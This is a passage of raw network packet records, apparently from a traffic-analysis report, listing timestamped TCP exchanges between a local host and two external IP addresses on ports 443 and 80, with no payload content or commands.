                                                  Dec 2, 2024 07:25:21.043354034 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.043375015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.043391943 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.043411970 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.046694040 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.046701908 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.046721935 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.046740055 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.046756029 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.049339056 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.049346924 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.049369097 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.049381971 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.049406052 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.052714109 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.052721977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.052767992 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.052783966 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.055337906 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.055346012 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.055383921 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.055397034 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.055432081 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.057995081 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.058001995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.058051109 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.058058977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.058077097 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.058116913 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.058701992 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:33.404659033 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:33.524589062 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:33.524667978 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:33.524817944 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:33.644649029 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107614994 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107690096 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107705116 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107733965 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107744932 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107816935 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.107868910 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.107887030 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107897043 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107908010 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.107959986 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.108187914 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.108197927 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.108277082 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.228010893 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.228030920 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.228111029 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.232079029 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.327774048 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.327876091 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.327907085 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.331935883 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.332021952 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.332092047 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.340476990 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.340553045 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.343359947 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.343492031 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.343539000 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.351819038 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.351892948 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.351942062 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.360217094 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.360341072 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.360389948 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.368561983 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.368752003 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.368833065 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.376991034 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.377115965 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.377194881 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.385361910 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.385473013 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.385554075 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.393774986 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.393903017 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.393985987 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.402146101 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.402241945 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.402334929 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.447870016 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.447942019 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.448007107 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.550879955 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.550894976 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.551002979 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.553606033 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.553658962 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.553731918 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.559081078 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.559189081 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.559269905 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.564646006 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.564742088 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.564820051 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.570198059 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.570262909 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.570347071 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.575711012 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.575834990 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.575927019 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.581247091 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.581355095 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.581440926 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.585081100 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.585237026 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.585315943 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.588900089 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.589143038 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.589222908 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.592734098 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.593122005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.593203068 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.596580029 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.596595049 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.596668005 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.600367069 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.601104021 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.601185083 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.604202986 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.604814053 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.604893923 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.608027935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.608402967 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.608478069 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.611864090 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.612088919 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.612168074 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.615675926 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.615695000 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.615763903 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.619502068 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.620457888 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.620548964 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.623323917 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.623598099 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.623681068 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.627120018 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.751553059 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.751616955 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.772991896 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.773145914 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.773313999 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.774677038 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.775269985 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.775335073 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.775414944 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.778681040 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.778731108 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.779429913 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.782079935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.782125950 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.782267094 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.785520077 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.785564899 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.785845041 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.788935900 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.788984060 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.789160967 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.792336941 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.792386055 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.792449951 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.795769930 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.795818090 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.796670914 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.799170971 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.799216986 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.799279928 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.802598000 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.802648067 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.803435087 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.803823948 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.805985928 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.807184935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.807229996 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.809411049 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.811805964 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.811851025 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.812880039 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.812891960 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.812932968 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.816253901 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.819703102 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.819717884 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.819729090 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.819750071 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.819772959 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.822227001 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.823090076 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.823761940 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.823812962 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.826473951 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.827883959 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.827933073 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.829951048 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.830049992 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.830096006 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.833317041 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.834814072 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.834860086 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.836749077 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.836766005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.836816072 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.840142965 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.840241909 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.840284109 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.842212915 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.843624115 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.844369888 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.844415903 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.846982002 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.847265005 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.847301006 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.850400925 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.850827932 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.850867033 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.853827953 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.854772091 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.854815006 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.857238054 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.857347012 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.857389927 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.860851049 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.893222094 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.893876076 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.893923998 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.895217896 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.895735979 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.895787001 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.898638010 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.901351929 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.901410103 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.902391911 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.902882099 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.902925968 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.905536890 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.907052994 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.907098055 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.908902884 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.909009933 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.909050941 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.912301064 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.912394047 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.912441969 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.915721893 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.995589018 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.995666027 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.995708942 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.997158051 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:35.997205019 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:35.997276068 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.000047922 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.000092030 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.000857115 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.003020048 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.003065109 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.003403902 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.006009102 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.006055117 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.006597042 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.008965969 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.009026051 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.009110928 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.011924028 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.011982918 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.013127089 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.014946938 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.015002012 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.015547037 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.017914057 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.017980099 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.019252062 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.020899057 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.020957947 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.021116018 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.022445917 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.022499084 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.022665024 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.024107933 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.024162054 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.024241924 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.025621891 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.025679111 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.025832891 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.027254105 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.027317047 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.027545929 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.028845072 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.028857946 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.028887987 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.030442953 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.030513048 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.030530930 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.032002926 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.032062054 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.032119036 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.033590078 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.033649921 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.034183025 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.035186052 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.035238028 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.035309076 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.036755085 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.036824942 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.037106991 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.038388968 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.038399935 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.038451910 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.039923906 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.041553020 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.041563988 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.041625977 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.041651964 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.043164015 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.043174982 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.043212891 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.044702053 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.045387030 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.045440912 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.046319008 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047424078 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047466993 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.047929049 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047940016 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.047976971 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.049448013 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.049563885 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.049607992 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.050024986 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.051003933 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.051100016 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.051160097 CET4917480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:36.052622080 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.052809000 CET8049174146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:36.052859068 CET4917480192.168.2.22146.70.113.200
